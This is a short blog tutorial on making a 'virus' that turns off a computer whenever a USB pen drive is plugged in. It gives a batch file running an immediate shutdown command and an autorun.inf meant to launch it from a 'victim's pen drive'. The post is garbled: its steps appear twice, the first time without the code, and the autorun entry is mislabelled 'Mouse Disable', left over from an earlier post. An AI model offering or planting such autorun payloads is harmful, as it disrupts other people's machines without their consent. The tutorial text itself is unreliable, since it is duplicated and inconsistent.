In my last post i explained you about how to create a virus which will disable the mouse whenever pen drive inserted. In this post i will help you to make the virus to make the system turned off whenever pen drive is inserted.
Step 1:
copy this code into notepad:
Save it with .bat extension (for eg: clickme.bat).
Step 2:
Now open the notepad and copy this code:
Save it as "autorun.inf"
//don't forget to change the "filname.bat" with your filname.bat.
Step 3:
Then copy the two files in your pen drive or victim's pen drive.
That's all whenever the victim insert his pen drive,the system will be turned off automatically.
Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .
Step 1:
copy this code into notepad:
@echo off
shutdown -s -t 00
shutdown -s -t 00
Save it with .bat extension (for eg: clickme.bat).
Step 2:
Now open the notepad and copy this code:
[autorun]
Open=filename.bat
Action=Mouse Disable
Open=filename.bat
Action=Mouse Disable
Save it as "autorun.inf"
//don't forget to change the "filname.bat" with your filname.bat.
Step 3:
Then copy the two files in your pen drive or victim's pen drive.
That's all whenever the victim insert his pen drive,the system will be turned off automatically.
Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .







0 comments:
Post a Comment